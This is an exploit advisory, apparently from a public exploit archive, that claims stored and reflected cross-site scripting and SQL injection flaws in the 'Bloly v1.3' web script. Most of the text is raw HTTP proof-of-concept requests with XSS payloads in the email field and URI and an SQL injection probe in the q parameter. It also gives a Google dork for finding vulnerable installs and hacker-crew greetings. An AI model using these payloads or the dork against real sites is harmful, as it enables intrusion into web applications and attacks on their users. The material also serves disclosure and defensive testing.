#### # Exploit Title: Bloly v1.3 (/SQL/Xss) Mutiple Vulnerabilities # Author: T0x!c # Facebook Page: www.facebook.com/DzTem # E-mail: Malik_99@hotmail.fr # Category:: webapps # Google Dork:[intext:"Bloly v1.3 by SoftCab Inc" ] # Software : http://www.lbb.org/script/telecharger.php?ID=6859 # Version: 1.3 # Tested on: || Windows || #### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | # | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | # | ------------------------------------------------- < | ## All vulnerabilities effects /Path/index.php. ####[ p0c 1 | Cross Site Scripting Vulnerabilities : ]===> POST /index.php?action=3 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: STORED XSS TEST Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache # [Post Data:]==> email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1 ####[ Cross Site Scripting in URI : ]===> +>Exploit: http://localhost/Path/index.php/>"><ScRiPt>alert(490545961838)</ScRiPt> ####[ p0c 2 Sql Injection : ]===> POST /index.php?action=11 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Sql Injection Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache # [Post Data:]==> q=%00' =================================**AlgeriansHackers**================================== # Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov * Indoushka * (exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz) =======================================================================================